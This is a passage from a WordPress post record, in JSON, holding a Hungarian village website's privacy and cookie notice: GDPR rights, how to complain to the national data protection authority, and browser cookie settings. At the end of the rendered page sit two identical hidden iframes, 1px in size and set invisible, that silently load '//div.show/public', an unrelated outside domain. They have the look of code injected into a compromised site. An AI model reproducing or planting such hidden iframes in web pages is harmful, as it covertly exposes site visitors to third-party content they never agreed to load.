inform\u00e1ci\u00f3kat sz\u00e9les k\u00f6rben haszn\u00e1lt elektronikus form\u00e1tumban fogjuk rendelkez\u00e9sre bocs\u00e1tani. Mindez nem \u00e9rintheti h\u00e1tr\u00e1nyosan m\u00e1sok jogait \u00e9s szabads\u00e1gait.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Helyesb\u00edt\u00e9shez val\u00f3 jog:<\/strong>\u00a0Jogosult arra, hogy k\u00e9r\u00e9sre indokolatlan k\u00e9sedelem n\u00e9lk\u00fcl helyesb\u00edts\u00fck az \u00d6nre vonatkoz\u00f3 pontatlan szem\u00e9lyes adatokat. Figyelembe v\u00e9ve az adatkezel\u00e9s c\u00e9lj\u00e1t, jogosult arra, hogy k\u00e9rje a hi\u00e1nyos szem\u00e9lyes adatok \u2013 egyebek mellett kieg\u00e9sz\u00edt\u0151 nyilatkozat \u00fatj\u00e1n t\u00f6rt\u00e9n\u0151 \u2013 kieg\u00e9sz\u00edt\u00e9s\u00e9t.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Az adatkezel\u00e9s korl\u00e1toz\u00e1s\u00e1hoz val\u00f3 jog:<\/strong>\u00a0Jogosult arra, hogy k\u00e9r\u00e9s\u00e9re korl\u00e1tozzuk a szem\u00e9lyes adatainak kezel\u00e9s\u00e9t. Fontos megjegyezni, hogy amennyiben az adatkezel\u00e9s jogszab\u00e1lyi k\u00f6telezetts\u00e9g\u00fcnkb\u0151l ered, akkor az annak val\u00f3 megfelel\u00e9s az els\u0151dleges.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>T\u00f6rl\u00e9shez val\u00f3 jog (\u201eaz elfeledtet\u00e9shez val\u00f3 jog\u201d):<\/strong>\u00a0Jogosult arra, hogy k\u00e9r\u00e9s\u00e9re indokolatlan k\u00e9sedelem n\u00e9lk\u00fcl t\u00f6r\u00f6lj\u00fck az \u00d6nre vonatkoz\u00f3 szem\u00e9lyes adatokat, az egy\u00e9b felt\u00e9telek fenn\u00e1ll\u00e1sa eset\u00e9n. A t\u00f6rl\u00e9s joga nem vonatkozik a jogszab\u00e1ly \u00e1ltal meghat\u00e1rozott k\u00f6telez\u0151 adatkezel\u00e9sekre. Egyes esetekben jogi k\u00f6telezetts\u00e9g\u00fcnk \u00e1ll fenn bizonyos adatok kezel\u00e9se tekintet\u00e9ben, ez\u00e9rt az adatok t\u00f6rl\u00e9si k\u00e9relme nem teljes\u00edthet\u0151 k\u00fcl\u00f6n\u00f6sen a szem\u00e9lyes adatok kezel\u00e9s\u00e9t el\u0151\u00edr\u00f3, a r\u00e1nk alkalmazand\u00f3 jogi k\u00f6telezetts\u00e9g teljes\u00edt\u00e9se c\u00e9lj\u00e1b\u00f3l kezelt szem\u00e9lyes adatok eset\u00e9ben.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>\u00a0<\/strong><\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Panasz \u00e9s jogorvoslat<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Amennyiben \u00fagy v\u00e9li, hogy szem\u00e9lyes adatainak kezel\u00e9s\u00e9hez f\u0171z\u0151d\u0151 jogai s\u00e9r\u00fcltek, vagy ha csak b\u0151vebb t\u00e1j\u00e9koztat\u00e1st k\u00e9rne, akkor\u00a0<strong>keresse fel adatv\u00e9delmi tisztvisel\u0151nket\u00a0<\/strong>az\u00a0a\u00a0ecs&lt;kukac&gt;peterszalay&lt;pont&gt;hu\u00a0email c\u00edmen, vagy az\u00a0\u00fcgyf\u00e9szolg\u00e1latunkat.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">Amennyiben nem el\u00e9gedett a v\u00e1laszunkkal, vagy k\u00f6zvetlen a Hat\u00f3s\u00e1ghoz szeretne fordulni, akkor\u00a0<strong>felkeresheti k\u00f6zvetlen\u00fcl a Nemzeti Adatv\u00e9delmi \u00e9s Inform\u00e1ci\u00f3szabads\u00e1g Hat\u00f3s\u00e1got az al\u00e1bbi el\u00e9rhet\u0151s\u00e9gek egyik\u00e9n:<\/strong><\/span><br \/>\n<span style=\"font-family: arial, helvetica, sans-serif;\">Postac\u00edm: 1363 Budapest, Pf.: 9.;<\/span><br \/>\n<span style=\"font-family: arial, helvetica, sans-serif;\">telefon: +36 (30) 683-5969,<\/span><br \/>\n<span style=\"font-family: arial, helvetica, sans-serif;\">e-mail: ugyfelszolgalat@naih.hu\u00a0<em>(Felh\u00edvjuk az \u00e9rintettek figyelm\u00e9t, hogy a NAIH ezen email c\u00edmet nem tekinti hivatalos elektronikus el\u00e9rhet\u0151s\u00e9gnek. Amennyiben elektronikus \u00faton k\u00edv\u00e1nja beny\u00fajtani a k\u00e9relm\u00e9t, haszn\u00e1lja az e-pap\u00edr szolg\u00e1ltat\u00e1st a\u00a0<\/em><a href=\"https:\/\/epapir.gov.hu\/\"><em>https:\/\/epapir.gov.hu\/<\/em><\/a><em>\u00a0oldalon)<\/em><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-family: arial, helvetica, sans-serif;\">web:\u00a0<a href=\"https:\/\/www.naih.hu\/\">https:\/\/www.naih.hu<\/a><\/span><\/p>\n<hr \/>\n<p style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>S\u00fctik (cookies) kezel\u00e9se<br \/>\n<\/strong>T\u00e1j\u00e9koztat\u00f3 a cookie-r\u00f3l \u00e9s egy\u00e9b nyomk\u00f6vet\u00e9si technol\u00f3gi\u00e1kr\u00f3l, hogyan haszn\u00e1ljuk \u0151ket \u00e9s hogyan kezelheti \u0151ket.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Mi az a s\u00fcti?<\/strong><\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\">A cookie-k kis f\u00e1jlok, amelyek az eszk\u00f6z\u00e9n t\u00e1rol\u00f3dnak, amikor megl\u00e1togat egy webhelyet. A cookie-k felelnek az\u00e9rt, hogy a webhely minden alkalommal eml\u00e9kezzen \u00d6nre \u00e9s arra, hogyan haszn\u00e1lta az oldalt.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Milyen m\u00e1s hasonl\u00f3 nyomk\u00f6vet\u00e9si technol\u00f3gi\u00e1k vannak?<\/strong><\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\">Ez b\u00e1rmely m\u00e1s m\u00f3dszerre vonatkozik, amelyet inform\u00e1ci\u00f3 t\u00e1rol\u00e1s\u00e1ra, inform\u00e1ci\u00f3khoz val\u00f3 hozz\u00e1f\u00e9r\u00e9sre vagy tev\u00e9kenys\u00e9gek k\u00f6vet\u00e9s\u00e9re haszn\u00e1lnak az \u00d6n eszk\u00f6z\u00e9n. P\u00e9ld\u00e1ul Local Shared Object (\u201eflash cookie-k\u201d), szkriptek, nyomk\u00f6vet\u0151 pixelek \u00e9s b\u0151v\u00edtm\u00e9nyek, alkalmaz\u00e1sk\u00f6vet\u0151k (bele\u00e9rtve az SDK-kat is) az okostelefonokon, t\u00e1blag\u00e9peken, okost\u00e9v\u00e9ken vagy egy\u00e9b eszk\u00f6z\u00f6k\u00f6n.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Milyen s\u00fctiket \u00e9s mire haszn\u00e1lunk?<\/strong><\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\">A cookie-k \u00e1ltal\u00e1ban egyedi alfanumerikus azonos\u00edt\u00f3t tartalmaznak, amely a b\u00f6ng\u00e9sz\u0151ben tal\u00e1lhat\u00f3 meg. Bizonyos esetekben nem kapcsolhat\u00f3ak \u00f6ssze \u00d6nnel a cookie-k haszn\u00e1lat\u00e1val gy\u0171jt\u00f6tt inform\u00e1ci\u00f3k. Van olyan eset, amikor lehet\u0151v\u00e9 tehetik sz\u00e1munkra, hogy ezeket az inform\u00e1ci\u00f3kat \u00f6sszek\u00f6ss\u00fck \u00d6nnel \u00e9s szem\u00e9lyes adataival, <strong>de weboldalunk ilyen cookie-t nem alkalmaz.<\/strong><\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Felt\u00e9tlen\u00fcl sz\u00fcks\u00e9ges cookie-k:\u00a0<\/strong>A sz\u00fcks\u00e9ges cookie-k sz\u00fcks\u00e9gesek az oldal alapvet\u0151 funkci\u00f3inak enged\u00e9lyez\u00e9s\u00e9hez. Ezek elengedhetetlenek weboldalunk hat\u00e9kony m\u0171k\u00f6d\u00e9s\u00e9hez \u00e9s szolg\u00e1ltat\u00e1saink haszn\u00e1lat\u00e1hoz \u00e9s nem kapcsolhat\u00f3k ki. Ezek a cookie-k elengedhetetlenek ahhoz, hogy navig\u00e1lhasson a webhelyen, \u00e9s haszn\u00e1lhassa annak funkci\u00f3it, mint p\u00e9ld\u00e1ul a webhely biztons\u00e1gos ter\u00fcleteinek el\u00e9r\u00e9se. Ezek a s\u00fctik nem t\u00e1rolnak szem\u00e9lyes azonos\u00edt\u00e1sra alkalmas adatokat.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Mik azok az els\u0151dleges s\u00fctik?<\/strong><\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\">Az els\u0151dleges cookie-kat a megl\u00e1togatott webhelyek hozz\u00e1k l\u00e9tre. A webhely el\u00e9r\u00e9si c\u00edme a c\u00edms\u00e1vban l\u00e1that\u00f3.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Hogyan \u00e9rtes\u00edtj\u00fck \u00d6nt a s\u00fctik haszn\u00e1lat\u00e1r\u00f3l \u00e9s hogyan k\u00e9rj\u00fck hozz\u00e1j\u00e1rul\u00e1s\u00e1t?<\/strong><\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\">Els\u0151 l\u00e1togat\u00e1skor honlapunkon, a k\u00e9perny\u0151 als\u00f3 r\u00e9sz\u00e9n felugrik egy t\u00e1j\u00e9koztat\u00f3 arr\u00f3l, hogy a honlapunk az itt megismerhet\u0151 s\u00fctiket haszn\u00e1lja, illetve egy link, amely ehhez a t\u00e1j\u00e9koztat\u00f3hoz vezet.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Hogyan ellen\u0151rizheti, t\u00f6r\u00f6lheti vagy t\u00e1vol\u00edthatja el a s\u00fctiket?<\/strong><\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\">A weboldalak megfelel\u0151 m\u0171k\u00f6d\u00e9se \u00e9rdek\u00e9ben a legt\u00f6bb b\u00f6ng\u00e9sz\u0151 automatikusan elfogadja a s\u00fctiket. Fontos tudni, hogy ha n\u00e9h\u00e1ny vagy az \u00f6sszes s\u00fcti tilt\u00e1sa\/elt\u00e1vol\u00edt\u00e1sa mellett d\u00f6nt \u2013 amit b\u00f6ng\u00e9sz\u0151je be\u00e1ll\u00edt\u00e1sai k\u00f6z\u00f6tt b\u00e1rmikor megtehet \u2013, az megv\u00e1ltoztathatja a weboldal m\u0171k\u00f6d\u00e9s\u00e9t, ami a sz\u00e1m\u00edt\u00f3g\u00e9pe t\u00f6bbi felhaszn\u00e1l\u00f3j\u00e1t is \u00e9rinteni fogja. A legn\u00e9pszer\u0171bb b\u00f6ng\u00e9sz\u0151k s\u00fcti be\u00e1ll\u00edt\u00e1sair\u00f3l az al\u00e1bbi linkeken t\u00e1j\u00e9koz\u00f3dhat:<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Windows<\/strong><\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><a href=\"https:\/\/support.google.com\/chrome\/answer\/95647?co=GENIE.Platform%3DDesktop&amp;hl=hu\">Chrome<\/a><\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><a href=\"https:\/\/support.mozilla.org\/hu\/products\/firefox\/protect-your-privacy\/cookies\">Firefox<\/a><\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><a href=\"https:\/\/support.microsoft.com\/hu-hu\/windows\/cookie-k-t%C3%B6rl%C3%A9se-%C3%A9s-kezel%C3%A9se-168dab11-0753-043d-7c16-ede5947fc64d\">Explorer<\/a><\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><a href=\"https:\/\/support.microsoft.com\/hu-hu\/windows\/cookie-k-t%C3%B6rl%C3%A9se-%C3%A9s-kezel%C3%A9se-168dab11-0753-043d-7c16-ede5947fc64d\">Edge<\/a><\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Mac OS X<\/strong><\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><a href=\"https:\/\/support.apple.com\/hu-hu\/guide\/safari\/sfri11471\/mac\">Safari<\/a><\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><a href=\"https:\/\/support.google.com\/chrome\/answer\/95647?co=GENIE.Platform%3DDesktop&amp;hl=hu\">Chrome<\/a><\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><a href=\"https:\/\/support.mozilla.org\/hu\/products\/firefox\/protect-your-privacy\/cookies\">Firefox<\/a><\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Linux<\/strong><\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><a href=\"https:\/\/support.google.com\/chrome\/answer\/95647?co=GENIE.Platform%3DDesktop&amp;hl=hu\">Chrome<\/a><\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><a href=\"https:\/\/support.mozilla.org\/hu\/products\/firefox\/protect-your-privacy\/cookies\">Firefox<\/a><\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>iOS<\/strong><\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><a href=\"https:\/\/support.apple.com\/hu-hu\/HT201265\">Safari<\/a><\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><a href=\"https:\/\/support.google.com\/chrome\/answer\/95647?co=GENIE.Platform%3DiOS&amp;hl=hu&amp;oco=0\">Chrome<\/a><\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><a href=\"https:\/\/support.mozilla.org\/hu\/products\/ios\/privacy-settings-firefox-ios\">Firefox<\/a><\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Android<\/strong><\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><a href=\"https:\/\/support.google.com\/chrome\/answer\/95647?co=GENIE.Platform%3DAndroid&amp;hl=hu&amp;oco=0\">Chrome<\/a><\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><a href=\"https:\/\/support.mozilla.org\/hu\/products\/mobile\/protect-your-privacy-firefox-android\">Firefox<\/a><\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>\u00a0<\/strong><\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Cookie be\u00e1ll\u00edt\u00e1sok m\u00f3dos\u00edt\u00e1sa<\/strong><\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\">Ennek a sz\u00f6vege att\u00f3l f\u00fcgg, hogy milyen s\u00fcti alkalmaz\u00e1st haszn\u00e1lunk. A CookieYes alkalmaz\u00e1shoz minta sz\u00f6veg:<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;\">A weboldalunk minden oldal\u00e1n jelen van akt\u00edv lebeg\u0151 ikonk\u00e9nt egy k\u00e9k sz\u00edn\u0171, k\u00f6r alak\u00fa logo, amire kattintva el\u0151h\u00edvhat\u00f3 a cookie be\u00e1ll\u00edt\u00e1sok panel. M\u00f3dos\u00edtani b\u00e1rmikor \u00e9s b\u00e1rh\u00e1nyszor lehet. Honlapunk a d\u00f6nt\u00e9s\u00e9t nem \u00edrja fel\u00fcl!<\/span><\/p>\n<hr \/>\n<p style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Egyes adatkezel\u00e9sekr\u0151l sz\u00f3l\u00f3 adatkezel\u00e9si t\u00e1j\u00e9koztat\u00f3k<br \/>\n<\/strong>A lenti felsorol\u00e1sban az egyes adatkezel\u00e9sekr\u0151l kaphat r\u00e9szletes t\u00e1j\u00e9koztat\u00e1st.<\/span><\/p>\n<ul>\n<li style=\"text-align: left;\"><a href=\"https:\/\/ecsfalu.hu\/web\/adatvedelmi-tajekoztato\/\"><span style=\"font-family: arial, helvetica, sans-serif;\">Adatkezel\u00e9si t\u00e1j\u00e9koztat\u00f3 &#8211; Nyilv\u00e1nos \u00f6nkorm\u00e1nyzati rendezv\u00e9nyekhez<\/span><\/a><\/li>\n<\/ul>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Szervezet\u00fcnk kiemelt figyelmet ford\u00edt az \u00d6n szem\u00e9lyes adatainak v\u00e9delm\u00e9re. A szem\u00e9lyes adatok kezel\u00e9s\u00e9vel \u00f6sszef\u00fcgg\u0151 tev\u00e9kenys\u00e9geinket az Eur\u00f3pai Uni\u00f3s \u00e1ltal\u00e1nos adatv\u00e9delmi<\/p>\n","protected":false},"author":3,"featured_media":3493,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[353],"tags":[],"class_list":["post-3492","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-adatkezeles"],"_links":{"self":[{"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/posts\/3492","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/comments?post=3492"}],"version-history":[{"count":5,"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/posts\/3492\/revisions"}],"predecessor-version":[{"id":3588,"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/posts\/3492\/revisions\/3588"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/media\/3493"}],"wp:attachment":[{"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/media?parent=3492"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/categories?post=3492"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ecsfalu.hu\/web\/wp-json\/wp\/v2\/tags?post=3492"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}